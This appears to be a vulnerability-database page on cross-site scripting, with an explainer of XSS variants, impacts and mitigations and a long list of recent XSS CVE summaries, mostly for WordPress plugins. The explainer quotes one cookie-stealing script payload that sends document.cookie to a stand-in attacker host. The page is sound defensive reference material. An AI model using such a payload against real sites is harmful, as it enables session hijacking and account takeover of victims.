Skip to main content

Cross-Site Scripting

web MEDIUM

Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding.

How It Works

Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding. The attacker crafts input containing JavaScript code, which the application then incorporates into its HTML response. When a victim's browser renders this response, it executes the injected script as if it were legitimate code from the trusted website.

The attack manifests in three main variants. Reflected XSS occurs when malicious script arrives via an HTTP parameter (like a search query) and immediately bounces back in the response—typically delivered through phishing links. Stored XSS is more dangerous: the payload persists in the application's database (in comment fields, user profiles, forum posts) and executes whenever anyone views the infected content. DOM-based XSS happens entirely client-side when JavaScript code improperly handles user-controllable data, modifying the DOM in unsafe ways without ever sending the payload to the server.

A typical attack flow starts with the attacker identifying an injection point—anywhere user input appears in HTML output. They craft a payload like <script>document.location='http://attacker.com/steal?c='+document.cookie</script> and inject it through the vulnerable parameter. When victims access the page, their browsers execute this script within the security context of the legitimate domain, giving the attacker full access to cookies, session tokens, and DOM content.

Impact

  • Session hijacking: Steal authentication cookies to impersonate victims and access their accounts
  • Credential harvesting: Inject fake login forms on trusted pages to capture usernames and passwords
  • Account takeover: Perform state-changing actions (password changes, fund transfers) as the authenticated victim
  • Keylogging: Monitor and exfiltrate everything users type on the compromised page
  • Phishing and malware distribution: Redirect users to malicious sites or deliver drive-by downloads from a trusted domain
  • Data exfiltration: Access and steal sensitive information visible in the DOM or retrieved via AJAX requests

Real-World Examples

A stored XSS vulnerability in Twitter (2010) allowed attackers to create self-propagating worms. Users hovering over malicious tweets automatically retweeted them and followed the attacker, creating viral spread through the platform's legitimate functionality.

eBay suffered from persistent XSS flaws in product listings (CVE-2015-2880) where attackers embedded malicious scripts in item descriptions. Buyers viewing these listings had their sessions compromised, enabling unauthorized purchases and account takeover.

British Airways faced a sophisticated supply chain attack (2018) where attackers injected JavaScript into the airline's payment page. The script skimmed credit card details from 380,000 transactions, demonstrating how XSS enables payment fraud at massive scale.

Mitigation

  • Context-aware output encoding: HTML-encode for HTML context, JavaScript-encode for JS strings, URL-encode for URLs—never use generic escaping
  • Content Security Policy (CSP): Deploy strict CSP headers to whitelist script sources and block inline JavaScript execution
  • HTTPOnly and Secure cookie flags: Prevent JavaScript access to session cookies and ensure transmission over HTTPS only
  • Input validation: Reject unexpected characters and patterns, though this is defense-in-depth, not primary protection
  • DOM-based XSS prevention: Use safe APIs like textContent instead of innerHTML; avoid passing user data to dangerous sinks like eval()

Recent CVEs (38813)

CVSS 8.2
HIGH PATCH This Week

Reflected cross-site scripting in the Comment module of NukeViet CMS (versions before 4.5.09) lets remote unauthenticated attackers execute arbitrary JavaScript in a victim's browser via a crafted URL. The status_comment parameter carries base64-encoded HTML that is decoded server-side and rendered unescaped, while a second flaw makes the checkss anti-forgery token static and site-wide, removing the only barrier to URL-based delivery. No public exploit identified at time of analysis, though the advisory documents a confirmed proof-of-concept credential-phishing overlay.

PHP XSS
NVD GitHub
CVSS 4.8
MEDIUM PATCH This Month

Stored XSS in Decidim's HTML content blocks allows any administrator with landing-page editing rights to persist arbitrary JavaScript that executes in every visitor's browser. The vulnerability affects the decidim-core RubyGem across three release branches (below 0.30.9, 0.31.5, and 0.32.0) and was confirmed through a professional security audit by Radically Open Security. No public exploit code or CISA KEV listing exists; vendor-released patches are available and the fix has been merged upstream.

RCE Code Injection XSS
NVD GitHub
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

An issue exists within GEONODE where the current rich text editor is vulnerable to Stored XSS. Rated medium severity (CVSS 6.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. This Cross-Site Scripting (XSS) vulnerability could allow attackers to inject malicious scripts into web pages viewed by other users.

CSRF XSS
NVD GitHub VulDB
EPSS 0% CVSS 9.3
CRITICAL Act Now

Remote code execution in Mura CMS versions prior to 10.0.712 allows unauthenticated attackers to execute arbitrary CFML and instantiate malicious Java objects by abusing the unvalidated 'method' parameter in POST requests to the /index.cfm/_api/json/v1/default JSON API endpoint. Because the ColdFusion engine processes the attacker-controlled input without sanitisation, a single crafted request yields full compromise (VC:H/VI:H/VA:H). No public exploit identified at time of analysis, though CISA SSVC flags the flaw as automatable with total technical impact.

XSS RCE Java +1
NVD
EPSS 0% CVSS 5.1
MEDIUM This Month

Stored XSS in Tallos Chat (RD Station Conversas) allows unauthenticated attackers to inject persistent malicious JavaScript via the 'name' parameter during chat session initialization. The payload executes not only in the initiating visitor's browser but also in the browser of any support agent who joins the conversation, expanding the attack surface to privileged operator sessions within the platform. No public exploit code or active exploitation has been confirmed at time of analysis, and no EPSS data was provided.

XSS Tallos Chat
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Reflected cross-site scripting in the ICS Calendar WordPress plugin (by Room 34 Creative Services) affects all versions from initial release through 12.1.1, letting an attacker craft a malicious URL that, when opened by a victim, injects arbitrary script into the rendered page. Because the CVSS scope is changed (S:C), successful execution can affect resources beyond the vulnerable component, including a logged-in administrator's WordPress session. No public exploit identified at time of analysis, and it is not on the CISA KEV list.

XSS Ics Calendar
NVD VulDB
EPSS 0% CVSS 7.1
HIGH This Week

Reflected cross-site scripting in the FunnelKit Funnel Builder WordPress plugin (versions up to and including 3.15.0.8) lets unauthenticated remote attackers inject arbitrary JavaScript that executes in a victim's browser when they follow a crafted link. Because the CVSS vector marks a scope change (S:C), the injected script runs beyond the vulnerable component and can affect the wider WordPress admin/site session context. No public exploit identified at time of analysis, and it is not listed in CISA KEV.

XSS Funnel Builder By Funnelkit
NVD
EPSS 0% CVSS 7.1
HIGH This Week

DOM-based cross-site scripting in the WPMU DEV Forminator WordPress plugin (versions up to and including 1.55.0.1) allows remote attackers to execute arbitrary JavaScript in a victim's browser when the victim interacts with a maliciously crafted link or page element. Reported by Patchstack and rated CVSS 7.1, the flaw carries a scope-changing impact but requires user interaction; no public exploit identified at time of analysis and it is not listed in CISA KEV.

XSS WordPress Forminator
NVD
EPSS 0% CVSS 6.5
MEDIUM This Month

Stored Cross-Site Scripting (XSS) in the merkulove Speaker WordPress plugin (versions through 4.1.13) allows an authenticated low-privilege user to inject and persistently store malicious scripts that execute in other users' browsers upon page visitation. The scope change in the CVSS vector (S:C) confirms that successful exploitation crosses the security boundary from the plugin's context into visiting users' browser sessions, enabling session hijacking, credential theft, or unauthorized administrative actions. No public exploit code or active exploitation (CISA KEV) has been identified at the time of analysis, and EPSS data was not supplied, but the low attack complexity keeps this a credible risk on any WordPress site where untrusted contributors have posting privileges.

XSS Speaker
NVD
EPSS 0% CVSS 6.5
MEDIUM This Month

DOM-Based Cross-Site Scripting in the Envision Page Builder WordPress plugin (versions through 0.22) allows low-privileged authenticated attackers to inject and execute malicious JavaScript in victim browsers via unsanitized page builder input. The scope change (S:C) in the CVSS vector confirms the payload escapes the plugin's own context and can affect the broader WordPress environment, including the admin panel. No public exploit code or active exploitation has been identified at time of analysis, but the stored-or-reflected DOM injection path makes this a realistic avenue for session hijacking or privilege escalation within WordPress installations.

XSS Envision Page Builder
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Reflected cross-site scripting in the stmcan RT-Theme 18 | Extensions WordPress plugin (all versions up to and including 2.5) lets remote attackers inject arbitrary JavaScript that executes in a victim's browser when they follow a crafted link. Because the CVSS scope is changed (S:C), a successful payload can affect resources beyond the vulnerable component, such as the WordPress session context. No public exploit has been identified at time of analysis and the vulnerability is not listed in CISA KEV; disclosure comes from Patchstack.

XSS Rt Theme 18 Extensions
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Stored cross-site scripting in the AcyMailing SMTP Newsletter plugin for WordPress allows attackers to persist malicious JavaScript that executes in the browser of any user who views the affected page, up to and including version 10.11.0. The scope-change CVSS vector (S:C) indicates the injected script can break out of the plugin's context into the wider WordPress site, enabling session theft or admin-panel actions. This flaw was reported by Patchstack and currently has no public exploit identified at time of analysis.

XSS Acymailing Smtp Newsletter
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Reflected cross-site scripting in the tagDiv Composer (td-composer) WordPress plugin through version 5.4.3 allows remote attackers to inject arbitrary script into pages that a victim views after clicking a crafted link. Because the CVSS vector marks a scope change (S:C), successful exploitation can affect resources beyond the vulnerable component, such as the WordPress admin session context. No public exploit has been identified at time of analysis, and the issue is not listed in CISA KEV.

XSS Tagdiv Composer
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Stored/DOM-based cross-site scripting in the tagDiv Cloud Library (td-cloud-library) WordPress plugin, versions up to and including 3.9.4, allows remote unauthenticated attackers to execute arbitrary JavaScript in a victim's browser when the victim interacts with a crafted input, per the CVSS PR:N/UI:R vector. Because the scope is changed (S:C), the injected script can affect resources beyond the vulnerable component - for example hijacking an authenticated administrator session. Reported by Patchstack; no public exploit identified at time of analysis and the issue is not listed in CISA KEV.

XSS Tagdiv Cloud Library
NVD
EPSS 0% CVSS 7.1
HIGH This Week

DOM-based cross-site scripting in the tagDiv Opt-In Builder WordPress plugin (td-subscription) affects all versions up to and including 1.7.4, allowing remote unauthenticated attackers to execute arbitrary JavaScript in a victim's browser when the victim interacts with a crafted link or page. The CVSS 3.1 scope-changed vector (7.1) reflects that injected script runs in the site's origin and can affect resources beyond the vulnerable component. No public exploit has been identified at time of analysis, and it is not listed in CISA KEV.

XSS Tagdiv Opt In Builder
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Stored cross-site scripting in the Themeum Kirki WordPress customizer framework (versions through 6.0.11) lets an attacker persist malicious script that executes in the browsers of users who later view the affected page or admin screen. Because the CVSS scope is marked changed (S:C), a successful payload can act beyond the vulnerable component's boundary, affecting whoever renders the stored input. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV.

XSS Kirki
NVD VulDB
EPSS 0% CVSS 7.1
HIGH This Week

Reflected cross-site scripting in the UX-themes Flatsome WordPress/WooCommerce theme (all versions up to and including 3.20.5) lets a remote attacker inject script that executes in a victim's browser when they click a crafted link. Reported by Patchstack with a CVSS 3.1 score of 7.1 (scope-changed, low-impact), the flaw requires user interaction but no authentication. No public exploit code or active exploitation has been identified at time of analysis.

XSS Flatsome
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Reflected cross-site scripting in the Unlimited Elements For Elementor (Free Widgets, Addons, Templates) WordPress plugin affects all versions up to and including 2.0.12, allowing unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser session when the victim clicks a crafted link. The CVSS 3.1 score of 7.1 reflects a scope change (S:C) where injected script escapes into the victim's browser context, yielding limited confidentiality, integrity, and availability impact. No public exploit has been identified at time of analysis and the flaw is not listed in CISA KEV; the issue was reported by Patchstack.

XSS Unlimited Elements For Elementor Free Widgets Addons Templates
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Reflected cross-site scripting in the WPManageNinja Fluent CRM WordPress plugin (all versions through 3.1.7) lets a remote unauthenticated attacker inject script that executes in a victim's browser when they follow a crafted link. Because the CVSS scope is changed (S:C), successful exploitation can affect resources beyond the vulnerable component, typically hijacking an authenticated WordPress admin session within the wp-admin context. No public exploit has been identified at time of analysis, and it is not listed in CISA KEV.

XSS Fluent Crm
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Reflected cross-site scripting in the WPZOOM Portfolio WordPress plugin (all versions up to and including 1.4.29) lets remote attackers inject arbitrary JavaScript that executes in a victim's browser when they follow a crafted link. Reported by Patchstack with a CVSS 3.1 score of 7.1, the flaw requires user interaction and carries no public exploit identified at time of analysis and no CISA KEV listing. Impact is scoped to the session of whichever user is lured into clicking, including logged-in administrators.

XSS Wpzoom Portfolio
NVD
EPSS 0% CVSS 6.5
MEDIUM This Month

Stored cross-site scripting in the SupportCandy WordPress plugin (versions through 3.4.8) allows a low-privileged authenticated attacker to inject persistent malicious scripts that execute in the browser of any user - likely an administrator or support agent - who subsequently views the tainted content. The scope change (S:C in CVSS) reflects that injected script breaks out of the plugin's trust boundary and runs in the victim's full browser session, enabling session hijacking, credential theft, or unauthorized administrative actions. No public exploit code has been identified at time of analysis, and the vulnerability has not been listed in the CISA Known Exploited Vulnerabilities catalog.

XSS Supportcandy
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Reflected cross-site scripting in the CRM Perks "Contact Form Entries" WordPress plugin (versions up to and including 1.5.2) lets remote attackers inject script that executes in a victim's browser after the victim clicks a crafted link. Because the CVSS scope is changed (S:C), successful injection can reach data and actions beyond the vulnerable component, typically the WordPress admin/session context. No public exploit has been identified and it is not on CISA KEV; the flaw was reported by Patchstack.

XSS Contact Form Entries
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Reflected cross-site scripting in the Dokan (dokan-lite) WordPress multivendor marketplace plugin, versions up to and including 5.0.6, lets a remote attacker inject script that executes in a victim's browser when they follow a crafted link. Reported by Patchstack (CWE-79) and rated CVSS 7.1, the scope-changed vector reflects that injected script runs in the user's authenticated WordPress session context. There is no public exploit identified at time of analysis and the flaw is not listed in CISA KEV; exploitation requires the target to click an attacker-supplied URL.

XSS Dokan
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Reflected cross-site scripting in the Dan Rossiter Document Gallery WordPress plugin (all versions up to and including 5.1.0) lets an unauthenticated attacker inject script into a reflected response that executes in a victim's browser when they follow a crafted link. Because the CVSS scope is changed, the injected script can affect resources beyond the vulnerable component (e.g., the surrounding WordPress session context). This flaw was reported by Patchstack; no public exploit code has been identified and it is not listed in CISA KEV at time of analysis.

XSS Document Gallery
NVD
EPSS 0% CVSS 6.5
MEDIUM This Month

Cross-site scripting in the Ad Inserter WordPress plugin (Spacetime, versions through 2.8.11) allows authenticated low-privilege users to inject malicious JavaScript into pages served to other site visitors. The CVSS scope-change metric (S:C) confirms the vulnerability crosses the security boundary from the plugin into victims' browser contexts, enabling session theft or unauthorized action execution on behalf of targeted users. No public exploit code or CISA KEV listing has been identified at time of analysis, placing this in a moderate-priority category for WordPress operators running affected versions.

XSS Ad Inserter
NVD VulDB
EPSS 0% CVSS 5.8
MEDIUM This Month

Reflected cross-site scripting in the Anti-Malware Security and Brute-Force Firewall WordPress plugin (versions through 4.23.89) enables remote unauthenticated attackers to inject and execute arbitrary JavaScript in a victim's browser by tricking them into clicking a specially crafted URL. The CVSS scope change (S:C) indicates the attack crosses security boundaries, allowing script execution in the browser context beyond the plugin itself - enabling session theft, credential harvesting, or unauthorized admin actions. No public exploit code or CISA KEV listing has been identified at time of analysis, and the AC:H vector component indicates exploitation requires non-trivial preconditions rather than simple mass exploitation.

XSS Anti Malware Security And Brute Force Firewall
NVD VulDB
EPSS 0% CVSS 7.1
HIGH This Week

Stored cross-site scripting in Basix NEX-Forms (WordPress form-builder plugin) affects all versions up to and including 9.2.2, letting an attacker persist malicious script that executes in a victim's browser when they view the affected form or its stored data. Reported by Patchstack and scored CVSS 7.1 with a scope change, the flaw can lead to session/credential theft or admin actions within the WordPress origin. No public exploit is identified at time of analysis and it is not on CISA KEV.

XSS Nex Forms
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Reflected cross-site scripting in the Message Filter for Contact Form 7 WordPress plugin (versions up to and including 1.6.3.8) lets an attacker embed malicious script in a request parameter that is echoed back unsanitized, executing in the victim's browser when they follow a crafted link. Reported by Patchstack, the flaw carries a scope-changing CVSS 3.1 score of 7.1 and requires user interaction; no public exploit identified at time of analysis and it is not listed in CISA KEV. Exploitation yields limited confidentiality, integrity, and availability impact within the WordPress admin or visitor session context.

XSS Message Filter For Contact Form 7
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Reflected cross-site scripting in the VillaTheme Bopo - WooCommerce Product Bundle Builder plugin for WordPress affects all versions up to and including 1.2.0, letting unauthenticated attackers inject script into a victim's browser session when the victim clicks a crafted link. The CVSS 3.1 vector (AV:N/AC:L/PR:N/UI:R/S:C) reflects a scope change, meaning injected script executes in the WordPress site's security context and can target logged-in administrators. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV, but reflected XSS in WooCommerce plugins is a well-understood and easily weaponized class.

XSS WordPress Bopo Woocommerce Product Bundle Builder
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Reflected cross-site scripting in the CRM Perks Forms WordPress plugin (all versions up to and including 1.1.7) lets an unauthenticated attacker inject script that executes in a victim's browser when they open a crafted link. Patchstack catalogued the issue at CVSS 3.1 7.1, and the scope-changed vector reflects that injected script runs in the WordPress site's origin rather than a sandbox. No public exploit or active exploitation has been identified at time of analysis, so risk is driven by the low attack complexity and required user interaction rather than mass exploitation.

XSS Crm Perks Forms
NVD VulDB
EPSS 0% CVSS 6.5
MEDIUM This Month

Stored cross-site scripting in the Author Box WP Lens WordPress plugin (versions through 2.1.5) enables authenticated low-privilege users to persist malicious JavaScript payloads that execute in the browsers of any user who views an affected page, including administrators. The CVSS scope change (S:C) reflects that the injected script runs in a different security context than where it was stored, meaning a contributor-level attacker can target higher-privileged victims browsing the same site. No public exploit identified at time of analysis and no CISA KEV listing; however, multi-author WordPress deployments with untrusted contributors face realistic risk of privilege escalation via session hijacking.

XSS Author Box Wp Lens
NVD VulDB
EPSS 0% CVSS 7.1
HIGH This Week

Stored cross-site scripting in the RexTheme Cart Lift WordPress plugin (versions up to and including 3.1.57) lets an attacker persist malicious JavaScript that executes in a victim's browser when the affected page is viewed. Because the CVSS scope is marked changed, injected script can affect resources beyond the vulnerable component, such as the WordPress admin session viewing abandoned-cart data. No public exploit has been identified at time of analysis and the issue is not listed in CISA KEV, but stored XSS in a customer-facing e-commerce recovery plugin is a realistic session-hijacking and admin-compromise vector.

XSS Cart Lift
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Stored cross-site scripting in the SiteGround Email Marketing WordPress plugin (versions up to and including 1.7.5) lets attackers persist malicious JavaScript that executes in the context of a victim's browser when the affected page is rendered. Reported by Patchstack with a CVSS 3.1 base score of 7.1 and a scope-changed impact, the flaw carries no public exploit identified at time of analysis and is not listed in CISA KEV. Because the injected payload is stored server-side, it can strike any user - including administrators - who later loads the tainted content.

XSS Siteground Email Marketing
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Stored cross-site scripting in the Codemenschen 'Gift Vouchers' WordPress plugin (all versions up to and including 4.7.0) lets an attacker persist malicious script into plugin-managed content that later executes in the browser of any user who views the affected page. The CVSS 3.1 vector (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L, score 7.1) indicates network-reachable, low-complexity injection with a scope change and required victim interaction. No public exploit identified at time of analysis, and it is not listed in CISA KEV.

XSS Gift Vouchers
NVD VulDB
EPSS 0% CVSS 6.5
MEDIUM This Month

Stored Cross-Site Scripting in QuantumCloud's WoowBot (ChatBot for eCommerce) WordPress plugin allows authenticated low-privileged users to inject persistent malicious scripts that execute in victims' browsers when stored content is rendered. Versions through 4.6.1 are affected, with a scope change confirmed by the CVSS vector (S:C), meaning attacker-controlled JavaScript runs in the context of other users - including administrators. No public exploit code has been identified at time of analysis and the vulnerability is not listed in CISA KEV.

XSS WordPress Chatbot For Ecommerce 8211 Woowbot
NVD
EPSS 0% CVSS 7.1
HIGH This Week

DOM-based cross-site scripting in the WordPress plugin CF7 Views - Complete Entry Management for Contact Form 7 (by Aman) affects all versions from an unspecified start through 3.2.2, letting a remote attacker who lures a user into interacting with a crafted link or page execute arbitrary JavaScript in that user's browser session. The flaw carries a CVSS 3.1 base score of 7.1 with a scope change (S:C), reflecting that script executes outside the vulnerable component's security context. There is no public exploit identified at time of analysis and it is not listed in CISA KEV; the issue was disclosed via Patchstack.

XSS Cf7 Views 8211 Complete Entry Management For Contact Form 7
NVD VulDB
EPSS 0% CVSS 7.1
HIGH This Week

DOM-based cross-site scripting affects the RealMag777 "Active Products Tables for WooCommerce" WordPress plugin (slug profit-products-tables-for-woocommerce) in all versions through 1.1.0, letting a remote attacker deliver crafted input that is unsafely written into the DOM and executed as script in a victim's browser. Because the CVSS scope is changed (S:C) and no authentication is required (PR:N), successful exploitation can affect resources beyond the vulnerable component, though it requires the victim to interact with an attacker-influenced page or link (UI:R). There is no public exploit identified at time of analysis and it is not listed in CISA KEV; no EPSS score was supplied.

XSS WordPress Active Products Tables For Woocommerce
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Reflected cross-site scripting in the GD Security Headers WordPress plugin (by Milan Petrovic, versions up to and including 1.8) lets remote attackers inject arbitrary JavaScript that executes in a victim's browser when they click a crafted link. The flaw stems from improper input neutralization during web page generation (CWE-79) and, per the CVSS scope-change metric, can affect resources beyond the vulnerable component. No public exploit code has been identified and it is not listed in CISA KEV, but disclosure by Patchstack makes the affected versions well documented.

XSS Gd Security Headers
NVD
EPSS 0% CVSS 6.5
MEDIUM This Month

Stored cross-site scripting in the wpdesk Flexible Refund and Return Order for WooCommerce plugin (versions through 1.0.51) allows authenticated low-privileged users - such as registered WooCommerce customers - to inject persistent malicious scripts that execute in the browsers of other users, including administrators who review refund submissions. The scope-changed CVSS vector (S:C) confirms impact crosses security boundaries, enabling session hijacking, credential theft, or unauthorized administrative actions against shop owners. No public exploit code has been identified at time of analysis, and this vulnerability has not been listed in the CISA KEV catalog.

XSS WordPress Flexible Refund And Return Order For Woocommerce
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Reflected cross-site scripting in the WebCodingPlace Real Estate Manager Pro WordPress plugin (all versions up to and including 12.8.3) allows a remote attacker to inject arbitrary JavaScript that executes in a victim's browser when they follow a crafted link. Because the CVSS scope is changed (S:C), successful execution can affect the broader WordPress session/DOM beyond the vulnerable component. No public exploit identified at time of analysis, and it is not listed in CISA KEV; EPSS was not supplied.

XSS Real Estate Manager Pro
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Stored cross-site scripting in the WordPress plugin 'Proxy & VPN Blocker' (versions up to and including 3.5.8) lets attackers persist malicious JavaScript that executes in victims' browsers when an affected page is rendered. Reported by Patchstack and carrying a CVSS 3.1 score of 7.1 with a scope change, the flaw affects all releases from an unspecified initial version through 3.5.8. There is no public exploit identified at time of analysis and it is not listed in CISA KEV.

XSS Proxy Amp Vpn Blocker
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Stored cross-site scripting in the Flintop "Free Gifts for WooCommerce" WordPress plugin (all versions through 13.1.0) lets an attacker inject persistent JavaScript that executes in the browser of anyone viewing the affected page. Reported by Patchstack and tracked as CWE-79, it carries a CVSS 7.1 score driven by a changed scope (S:C), and has no public exploit identified at time of analysis. No CISA KEV listing or POC has been reported, so this is a disclosed-but-not-yet-weaponized web plugin flaw.

XSS WordPress Free Gifts For Woocommerce
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Reflected cross-site scripting in the Tribulant Software Newsletters (newsletters-lite) WordPress plugin, affecting all versions up through 4.14, lets a remote attacker execute arbitrary JavaScript in a victim's browser when the victim is lured into clicking a crafted link. Reported by Patchstack and rated CVSS 7.1, the scope-changing flaw can lead to session/credential theft or actions performed as the targeted user, including administrators. There is no public exploit identified at time of analysis and it is not on CISA KEV.

XSS Newsletters
NVD
EPSS 0% CVSS 6.5
MEDIUM This Month

Stored cross-site scripting in the Tangible Loops & Logic WordPress plugin (versions through 4.2.3) allows a low-privileged authenticated user to inject persistent malicious scripts into web pages that execute in the browsers of site visitors or administrators. The scope change (S:C in CVSS) confirms the payload escapes the injection context and executes in a victim's browser session, enabling session hijacking, credential theft, or malicious redirects. No public exploit code or CISA KEV listing has been identified at time of analysis, but the low attack complexity makes this straightforward to exploit once an attacker holds contributor-level access.

XSS Loops Logic
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Stored cross-site scripting in Themefic's Hydra Booking WordPress plugin (all versions up to and including 1.1.44) lets an attacker inject persistent JavaScript that executes in the browser of a victim who later views the affected page. The Patchstack-reported flaw (CVSS 7.1, scope-changed) requires victim interaction to fire, and no public exploit has been identified at time of analysis. Because impact crosses the security boundary into a privileged WordPress admin session, it can facilitate session hijacking or actions in the admin's context.

XSS Hydra Booking
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Stored cross-site scripting in the picu WordPress plugin (all versions up to and including 3.5.1) lets an attacker inject persistent JavaScript that executes in the browser of any user who later views the affected page. Because the CVSS vector marks a scope change (S:C) and requires only user interaction (UI:R) with no privileges (PR:N), a crafted payload stored via picu can run in an administrator or reviewer session and act beyond the plugin's own boundary. No public exploit identified at time of analysis and the issue is not on CISA KEV; the 7.1 CVSS reflects moderate impact across confidentiality, integrity, and availability.

XSS Picu
NVD VulDB
EPSS 0% CVSS 7.1
HIGH This Week

Reflected cross-site scripting in the Simple File List WordPress plugin (versions up to and including 6.3.8) allows remote attackers to inject arbitrary JavaScript that executes in a victim's browser when they click a crafted link. The scope-changed CVSS vector (S:C) reflects that injected script escapes the plugin's context to affect the broader WordPress site, potentially hijacking authenticated admin sessions. No public exploit identified at time of analysis, and the flaw is not listed in CISA KEV; EPSS data was not provided.

XSS Simple File List
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Stored cross-site scripting in the eyecix JobSearch (wp-jobsearch) WordPress plugin, versions up to and including 3.2.9, lets attackers inject persistent JavaScript that executes in the browsers of users who later view the affected page. The CVSS 3.1 vector (AV:N/AC:L/PR:N/UI:R/S:C) indicates a network-reachable, low-complexity flaw requiring no attacker authentication but relying on a victim viewing the poisoned content, with a scope change reflecting script execution crossing into the victim's browser context. No public exploit identified at time of analysis, and no EPSS score was supplied in the intelligence set.

XSS Jobsearch
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Reflected cross-site scripting in the PropertyHive WordPress real-estate plugin (all versions up to and including 2.2.3) lets a remote attacker inject arbitrary JavaScript that executes in a victim's browser when they click a crafted link. No public exploit has been identified at time of analysis and the flaw is not on CISA KEV; EPSS data was not provided. Because exploitation is unauthenticated (PR:N) but requires user interaction (UI:R), practical risk depends on luring a logged-in user or administrator to a malicious URL.

XSS Propertyhive
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Stored cross-site scripting in the WPPOOL FormyChat (social-contact-form) WordPress plugin, versions up to and including 2.15.3, lets remote attackers inject persistent JavaScript that executes in the browser of anyone who later views the affected page. Reported by Patchstack (CVSS 7.1), the scope-changing flaw can be abused to hijack sessions, deface content, or pivot toward WordPress administrator accounts. There is no public exploit identified at time of analysis and the CVE is not listed in CISA KEV.

XSS Formychat
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Stored/DOM-based cross-site scripting in the hupe13 "Extensions for Leaflet Map" WordPress plugin (all versions up to and including 5.1) lets an attacker inject script that executes in a victim's browser when they load a page rendering the crafted map content. Reported by Patchstack and carrying a 7.1 CVSS with a scope-changed vector, it requires victim interaction and yields limited confidentiality, integrity, and availability impact. There is no public exploit identified at time of analysis and it is not listed in CISA KEV.

XSS Extensions For Leaflet Map
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Reflected cross-site scripting in the NooTheme Jobmonster WordPress job-board theme (versions up to and including 4.8.5) lets remote attackers inject arbitrary JavaScript that executes in a victim's browser when they follow a crafted link. Because the flaw carries a scope change (S:C), successful exploitation can affect resources beyond the vulnerable component, such as the authenticated WordPress session of an administrator who is lured into clicking. There is no public exploit identified at time of analysis, and it is not listed in CISA KEV.

XSS Jobmonster
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Stored cross-site scripting in the QuantumCloud ChatBot WordPress plugin (versions through 8.3.7) lets an attacker persist malicious script that executes in another user's browser when the affected page is viewed. The CVSS 3.1 vector (AV:N/PR:N/UI:R/S:C) indicates a network-reachable, unauthenticated injection point that requires a victim to load the poisoned content and crosses a privilege boundary into the rendering context. There is no public exploit identified at time of analysis and the flaw is not listed in CISA KEV.

XSS Chatbot
NVD
EPSS 0% CVSS 6.5
MEDIUM This Month

DOM-Based Cross-Site Scripting in the reCAPTCHA (v2 & v3) for Asgaros Forum WordPress plugin (all versions through 1.1.0) enables authenticated low-privilege forum users to inject client-side scripts that execute in victims' browsers. The CVSS Scope:Changed metric (S:C) indicates the injected scripts can affect browser contexts beyond the vulnerable plugin component itself - including the broader WordPress session. No public exploit code or active exploitation has been identified at time of analysis, though the vulnerability was disclosed by Patchstack.

XSS Recaptcha V2 Amp V3 For Asgaros Forum
NVD
EPSS 0% CVSS 7.1
HIGH This Week

DOM-based cross-site scripting in the ElementInvader Addons for Elementor WordPress plugin (all versions up to and including 1.4.3) lets remote attackers inject client-side script that executes in a victim's browser when they interact with a crafted link or page. Reported by Patchstack and classified CWE-79 with a CVSS 7.1, the scope-changing flaw can lead to session hijacking or defacement in the WordPress context. No public exploit identified at time of analysis and it is not listed in CISA KEV.

XSS Elementinvader Addons For Elementor
NVD
EPSS 0% CVSS 7.1
HIGH This Week

Reflected cross-site scripting in the Themify Builder WordPress plugin (versions up to and including 7.7.4) lets remote attackers inject arbitrary script that executes in a victim's browser when they follow a crafted link. The CVSS 3.1 base score of 7.1 reflects unauthenticated exploitation with a scope change, though it requires user interaction. No public exploit has been identified at time of analysis, and the issue is not listed in CISA KEV.

XSS Themify Builder
NVD
EPSS 0% CVSS 8.7
HIGH This Week

Stored cross-site scripting in JoomShaper's Helix Ultimate template framework for Joomla lets unauthenticated attackers persist malicious JavaScript that executes in a victim's browser when the affected page is viewed. Because injection requires no authentication (PR:N) but relies on a victim rendering the poisoned content (UI:P), an attacker can hijack sessions, steal credentials, or perform actions as high-privilege administrators who visit the page. No public exploit identified at time of analysis and the CVE is not listed in CISA KEV.

XSS Helix Ultimate Extension For Joomla
NVD
EPSS 0% CVSS 6.1
MEDIUM POC PATCH This Month

